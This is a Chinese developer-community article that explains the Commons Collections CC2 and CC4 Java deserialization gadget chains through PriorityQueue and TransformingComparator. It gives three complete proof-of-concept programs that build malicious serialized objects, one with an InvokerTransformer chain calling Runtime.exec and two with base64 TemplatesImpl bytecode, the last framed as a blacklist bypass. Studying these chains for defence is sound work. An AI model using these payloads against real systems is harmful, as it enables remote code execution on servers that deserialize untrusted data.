AI 助理
文档备案控制台
开发者社区 开发与运维 文章 正文

Java反序列化-CC2分析

2023-11-02 140
版权
版权声明:
本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《 阿里云开发者社区用户服务协议》和 《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写 侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
简介: Java反序列化-CC2分析

如何将PriorityQueue、TransformingComparator 作为入口点和跳板去利用

首先看一下作为跳板的 TransformingComparator 类是怎么调用到利用链的


public int compare(final I obj1, final I obj2) {
        final O value1 = this.transformer.transform(obj1);
        final O value2 = this.transformer.transform(obj2);
        return this.decorated.compare(value1, value2);
    }

在 TransformingComparator#compare 方法中,调用到了transform 方法去修饰 obj1、obj2 的值。就是这个方法调用到了利用链

接着在看一下 PriorityQueue 类是怎么作为入口点去利用的


private void readObject(java.io.ObjectInputStream s)
        throws java.io.IOException, ClassNotFoundException {
        // Read in size, and any hidden stuff
        s.defaultReadObject();
        // Read in (and discard) array length
        s.readInt();
        queue = new Object[size];
        // Read in all elements.
        for (int i = 0; i < size; i++)
            queue[i] = s.readObject();
        // Elements are guaranteed to be in "proper order", but the
        // spec has never explained what that might be.
        heapify();
    }

在PriorityQueue#readObject 方法中,将反序列化的数据存放在queue 字段中,之后调用 heapify 方法来对数据进行调整,形成二叉堆

在对数据进行调整的时候会对数据进行比较,将较小的数排列在前面。而在对数据进行比较的时候就会调用到compare 方法,从而让PriorityQueue 类和TransformingComparator产生联系。看一下这个操作是怎么在代码中实现的


private void heapify() {
        for (int i = (size >>> 1) - 1; i >= 0; i--)
            siftDown(i, (E) queue[i]);
    }

在 heapify 方法中,采用将数向后移动的方式来对数据进行调整。


private void siftDown(int k, E x) {
        if (comparator != null)
            siftDownUsingComparator(k, x);
        else
            siftDownComparable(k, x);
    }

在后移之前会判断,判断是否有比较器 (compar),如果有的话则调用if 中的方法,否则调用 else 中的方法。这里直接看i分钟的方法,因为只有当有比较器的时候才会调用比较器中的方法来比较两个数


private void siftDownUsingComparator(int k, E x) {
        int half = size >>> 1;
        while (k < half) {
            int child = (k << 1) + 1;
            Object c = queue[child];
            int right = child + 1;
            if (right < size &&
                comparator.compare((E) c, (E) queue[right]) > 0)
                c = queue[child = right];
            if (comparator.compare(x, (E) c) <= 0)
                break;
            queue[k] = c;
            k = child;
        }
        queue[k] = x;
    }

可以看见,if 中的方法,调用了比较器中的比较方法去对两个数进行比较。就是这一步操作,让作为入口点的 PriorityQueue 类可以于作为跳板的TransformingComparator 类结合起来使用。

利用PriorityQueue 和TransformingComparator 构造poc

这里先给出利用链


PriorityQueue.readObject()
  TransformingComparator.compare()
    ChainedTransformer.transform()
      InvokerTransformer.transform()

开始构造poc

public static void main(String[] args) throws Exception{
        //构造恶意数组
        Transformer[] transformers = new Transformer[]{
                new ConstantTransformer(Runtime.class),
                new InvokerTransformer("getMethod", new Class[]{String.class,Class[].class}, new Object[]{"getRuntime",new Class[]{}}),
                new InvokerTransformer("invoke", new Class[]{Object.class,Object[].class}, new Object[]{null,new Object[]{}}),
                new InvokerTransformer("exec", new Class[]{String.class}, new Object[]{"calc"})
        };
        //构造无害数组
        Transformer[] test = new Transformer[]{};
        //在执行add方法 调用compare 方法进行比较的时候使用无害的数组
        ChainedTransformer chain = new ChainedTransformer(test);
        PriorityQueue queue = new PriorityQueue(new TransformingComparator(chain));
        queue.add(1);
        queue.add(1);
        //在调用完add 方法后通过反射修改 chain的数组,将无害数组替换成恶意数组,之后反序列化的初始化二叉堆的时候调用恶意数组执行代码
        Field field = chain.getClass().getDeclaredField("iTransformers");
        field.setAccessible(true);
        field.set(chain,transformers);
        ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("CC2"));
        oos.writeObject(queue);
        ObjectInputStream ois = new ObjectInputStream(new FileInputStream("CC2"));
        ois.readObject();
    }

这里还可以使用CC3中的 TemplatesImpl 类来构造poc

这里就不讲解了,直接给出poc

public static void main(String[] args) throws Exception{
        //创建恶意字节码
        byte[] bytes = Base64.getDecoder().decode("yv66vgAAADQAIQoABgATCgAUABUIABYKABQAFwcAGAcAGQEACXRyYW5zZm9ybQEAcihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBAApFeGNlcHRpb25zBwAaAQCmKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABjxpbml0PgEAAygpVgcAGwEAClNvdXJjZUZpbGUBAA1FdmlsVGVzdC5qYXZhDAAOAA8HABwMAB0AHgEABGNhbGMMAB8AIAEACEV2aWxUZXN0AQBAY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL3J1bnRpbWUvQWJzdHJhY3RUcmFuc2xldAEAOWNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9UcmFuc2xldEV4Y2VwdGlvbgEAE2phdmEvbGFuZy9FeGNlcHRpb24BABFqYXZhL2xhbmcvUnVudGltZQEACmdldFJ1bnRpbWUBABUoKUxqYXZhL2xhbmcvUnVudGltZTsBAARleGVjAQAnKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1Byb2Nlc3M7ACEABQAGAAAAAAADAAEABwAIAAIACQAAABkAAAADAAAAAbEAAAABAAoAAAAGAAEAAAAMAAsAAAAEAAEADAABAAcADQACAAkAAAAZAAAABAAAAAGxAAAAAQAKAAAABgABAAAAEQALAAAABAABAAwAAQAOAA8AAgAJAAAALgACAAEAAAAOKrcAAbgAAhIDtgAEV7EAAAABAAoAAAAOAAMAAAASAAQAEwANABQACwAAAAQAAQAQAAEAEQAAAAIAEg==");
        TemplatesImpl obj = new TemplatesImpl();
        setFieldValue(obj,"_bytecodes",new byte[][]{bytes});
        setFieldValue(obj,"_name","sakut2");
        setFieldValue(obj,"_tfactory",new TransformerFactoryImpl());
        //先使用无危害payload 以免提前触发漏洞 参考URLDNS
        Transformer transformer = new InvokerTransformer("toString",null,null);
        PriorityQueue queue = new PriorityQueue(new TransformingComparator(transformer));
        //将恶意字节码添加到queue 中,反序列化调整二叉堆时作为比较的参数使用
        queue.add(obj);
        queue.add(obj);
        //在add 方法执行完之后修改payload 之后反序列化的时候就会触发漏洞代码了
        setFieldValue(transformer,"iMethodName","newTransformer");
        ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("CC2"));
        oos.writeObject(queue);
        ObjectInputStream ois = new ObjectInputStream(new FileInputStream("CC2"));
        ois.readObject();
    }
        public static void setFieldValue(Object obj,String fieldName,Object value)throws Exception{
        Field field = obj.getClass().getDeclaredField(fieldName);
        field.setAccessible(true);
        field.set(obj,value);
    }

commons-collections4 在CC2中的作用

在上面的poc 中可能大家觉得commons-collections4和commons-collections 没什么区别啊,新用到的这两个类在commons-collections 中也有啊,为什么不能直接用 commons-collections 来构造poc。

在这里,只看poc 可能看不出什么区别,但要使用commons-collections 运行这个poc 就会发现报错了。这里把commons-collections4中导入的类全部注入替换成commons-collections 中的类 ,然后运行一下看看会是什么结果。

image.png

image.png

发现在将类序列化的时候抛出了异常,这里爆出TransformingComparator 不具有Serializable 接口。

在commons-collections 中,TransformingComparator 类并不具有 Serializable 接口,所以在进行序列化操作的时候会报错。在commons-collections4 中,对TransformingComparator 类添加了 Serializable 接口 使其具有序列化的功能。

CC4

在CC3 中有讲过黑名单这个概念,CC4 就是绕黑名单的CC2,其原理是一样的。这里直接给出poc


public static void setFieldValue(Object obj,String fieldName,Object value)throws Exception{
        Field field = obj.getClass().getDeclaredField(fieldName);
        field.setAccessible(true);
        field.set(obj,value);
    }
    public static void main(String[] args) throws Exception{
        //创建恶意字节码
        byte[] bytes = Base64.getDecoder().decode("yv66vgAAADQAIQoABgATCgAUABUIABYKABQAFwcAGAcAGQEACXRyYW5zZm9ybQEAcihMY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL0RPTTtbTGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABENvZGUBAA9MaW5lTnVtYmVyVGFibGUBAApFeGNlcHRpb25zBwAaAQCmKExjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7TGNvbS9zdW4vb3JnL2FwYWNoZS94bWwvaW50ZXJuYWwvc2VyaWFsaXplci9TZXJpYWxpemF0aW9uSGFuZGxlcjspVgEABjxpbml0PgEAAygpVgcAGwEAClNvdXJjZUZpbGUBAA1FdmlsVGVzdC5qYXZhDAAOAA8HABwMAB0AHgEABGNhbGMMAB8AIAEACEV2aWxUZXN0AQBAY29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL3J1bnRpbWUvQWJzdHJhY3RUcmFuc2xldAEAOWNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9UcmFuc2xldEV4Y2VwdGlvbgEAE2phdmEvbGFuZy9FeGNlcHRpb24BABFqYXZhL2xhbmcvUnVudGltZQEACmdldFJ1bnRpbWUBABUoKUxqYXZhL2xhbmcvUnVudGltZTsBAARleGVjAQAnKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1Byb2Nlc3M7ACEABQAGAAAAAAADAAEABwAIAAIACQAAABkAAAADAAAAAbEAAAABAAoAAAAGAAEAAAAMAAsAAAAEAAEADAABAAcADQACAAkAAAAZAAAABAAAAAGxAAAAAQAKAAAABgABAAAAEQALAAAABAABAAwAAQAOAA8AAgAJAAAALgACAAEAAAAOKrcAAbgAAhIDtgAEV7EAAAABAAoAAAAOAAMAAAASAAQAEwANABQACwAAAAQAAQAQAAEAEQAAAAIAEg==");
        TemplatesImpl obj = new TemplatesImpl();
        setFieldValue(obj,"_bytecodes",new byte[][]{bytes});
        setFieldValue(obj,"_name","sakut2");
        setFieldValue(obj,"_tfactory",new TransformerFactoryImpl());
        //创建无危害数组
        Transformer[] transformer = new Transformer[]{};
        //构造恶意数组
        Transformer[] exp = new Transformer[]{
                new ConstantTransformer(TrAXFilter.class),
                new InstantiateTransformer(new Class[]{Templates.class},new Object[]{obj})
        };
        //将数组带入类中
        ChainedTransformer chain = new ChainedTransformer(transformer);
        PriorityQueue queue = new PriorityQueue(new TransformingComparator(chain));
        queue.add(1);
        queue.add(1);
        setFieldValue(chain,"iTransformers",exp);
        ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream("Temp_CC4"));
        oos.writeObject(queue);
        ObjectInputStream ois = new ObjectInputStream(new FileInputStream("Temp_CC4"));
        ois.readObject();
    }
文章标签:
Java
关键词:
Java反序列化
Java分析
Java序列化
Java反序列化分析
序列化分析
syst1_m
目录
相关文章
poemyang
|
6月前
|
安全 Java 编译器
new出来的对象,不一定在堆上?聊聊Java虚拟机的优化技术:逃逸分析
逃逸分析是一种静态程序分析技术,用于判断对象的可见性与生命周期。它帮助即时编译器优化内存使用、降低同步开销。根据对象是否逃逸出方法或线程,分析结果分为未逃逸、方法逃逸和线程逃逸三种。基于分析结果,编译器可进行同步锁消除、标量替换和栈上分配等优化,从而提升程序性能。尽管逃逸分析计算复杂度较高,但其在热点代码中的应用为Java虚拟机带来了显著的优化效果。
poemyang
202 4
凉凉心.
|
4月前
|
存储 Java Go
【Java】(3)8种基本数据类型的分析、数据类型转换规则、转义字符的列举
牢记类型转换规则在脑海中将编译和运行两个阶段分开,这是两个不同的阶段,不要弄混!
凉凉心.
265 2
凉凉心.
|
4月前
|
JSON 网络协议 安全
【Java】(10)进程与线程的关系、Tread类;讲解基本线程安全、网络编程内容;JSON序列化与反序列化
几乎所有的操作系统都支持进程的概念,进程是处于运行过程中的程序,并且具有一定的独立功能,进程是系统进行资源分配和调度的一个独立单位一般而言,进程包含如下三个特征。独立性动态性并发性。
凉凉心.
253 1
凉凉心.
|
4月前
|
Java Go 开发工具
【Java】(9)抽象类、接口、内部的运用与作用分析,枚举类型的使用
抽象类必须使用abstract修饰符来修饰,抽象方法也必须使用abstract修饰符来修饰,抽象方法不能有方法体。抽象类不能被实例化,无法使用new关键字来调用抽象类的构造器创建抽象类的实例。抽象类可以包含成员变量、方法(普通方法和抽象方法都可以)、构造器、初始化块、内部类(接 口、枚举)5种成分。抽象类的构造器不能用于创建实例,主要是用于被其子类调用。抽象类中不一定包含抽象方法,但是有抽象方法的类必定是抽象类abstract static不能同时修饰一个方法。
凉凉心.
257 1
凉凉心.
|
4月前
|
JSON 网络协议 安全
【Java基础】(1)进程与线程的关系、Tread类;讲解基本线程安全、网络编程内容;JSON序列化与反序列化
几乎所有的操作系统都支持进程的概念,进程是处于运行过程中的程序,并且具有一定的独立功能,进程是系统进行资源分配和调度的一个独立单位一般而言,进程包含如下三个特征。独立性动态性并发性。
凉凉心.
268 2
小白学大数据
|
5月前
|
数据采集 存储 弹性计算
高并发Java爬虫的瓶颈分析与动态线程优化方案
高并发Java爬虫的瓶颈分析与动态线程优化方案
小白学大数据
316 1
青云交(Java大数据AI云原生Python)
|
6月前
|
机器学习/深度学习 安全 Java
Java 大视界 -- Java 大数据在智能金融反洗钱监测与交易异常分析中的应用(224)
本文探讨 Java 大数据在智能金融反洗钱监测与交易异常分析中的应用,介绍其在数据处理、机器学习建模、实战案例及安全隐私等方面的技术方案与挑战,展现 Java 在金融风控中的强大能力。
青云交(Java大数据AI云原生Python)
238 0
青云交(Java大数据AI云原生Python)
|
7月前
|
存储 Java 大数据
Java 大视界 -- Java 大数据在智能家居能源消耗模式分析与节能策略制定中的应用(198)
简介:本文探讨Java大数据技术在智能家居能源消耗分析与节能策略中的应用。通过数据采集、存储与智能分析,构建能耗模型,挖掘用电模式,制定设备调度策略,实现节能目标。结合实际案例,展示Java大数据在智能家居节能中的关键作用。
青云交(Java大数据AI云原生Python)
427 0
程序员小假
|
8月前
|
存储 Java 编译器
说一说关于序列化/反序列化中的细节问题
我是小假 期待与你的下一次相遇 ~
程序员小假
147 1
程序员小假
|
8月前
|
JSON Java 数据库连接
Java 序列化和反序列化为什么要实现 Serializable 接口
我是小假 期待与你的下一次相遇 ~
程序员小假
192 1

热门文章

最新文章

  • 1
    Linux系统小技巧(1):/dev/random设备可能导致java程序启动慢或者操作耗时不正常
  • 2
    解决java.lang.IllegalArgumentException: 'Content-Type' cannot contain wildcard type '*'异常(真实有效)
  • 3
    Java规则引擎Drools急速入门
  • 4
    java ,apns, javapns ios消息推送 吐槽
  • 5
    Java—优化 if-else 代码的 8 种方案
  • 6
    MessagePack Java 0.6.X 快速开始指南 - 安装
  • 7
    Maven项目指定编译的java版本和源码编码
  • 8
    JAVA FTP 和 SFTP 文件上传 、下载
  • 9
    android ubuntu jni so 报错Java_com_gcx_ndkjni_HelloNdkJni_stringFromNDKJNI
  • 10
    Java微服务项目搭建之技术选型
  • 1
    如何选择序列化协议:关键因素与场景分析
    190
  • 2
    使用序列化和反序列化函数archivedDataWithRootObject和unarchivedObjectOfClasses的使用和遇到问题及解决方案
    536
  • 3
    Java 序列化
    206
  • 4
    省市区三级联动数据本地序列化和反序列化
    174
  • 5
    对象数组序列化和反序列化
    112
  • 6
    实时计算 Flink版产品使用合集之如何重写序列化器
    185
  • 7
    iOS的数据序列化(又称持久化)的两类使用方式
    208
  • 8
    【Golang】国密SM2公钥私钥序列化到redis中并加密解密实战_sm2反编(1)
    475
  • 9
    Java一分钟之-Java序列化与反序列化
    195
  • 10
    SpringDataRedis 操作 Redis,并指定数据序列化器
    529

    • 相关课程

    更多
  • Java面试疑难点解析 - 面试技巧及语言基础
  • Java面试疑难点解析 - Java Web开发
  • Java面试疑难点解析 - 系统架构及项目设计
  • Java编程入门
  • Java面向对象编程
  • Java高级编程

    • 相关电子书

    更多
  • Spring Cloud Alibaba - 重新定义 Java Cloud-Native
  • The Reactive Cloud Native Arch
  • JAVA开发手册1.5.0
    • 下一篇
    第五届伏魔挑战赛如约来袭,诚邀各路高手来战!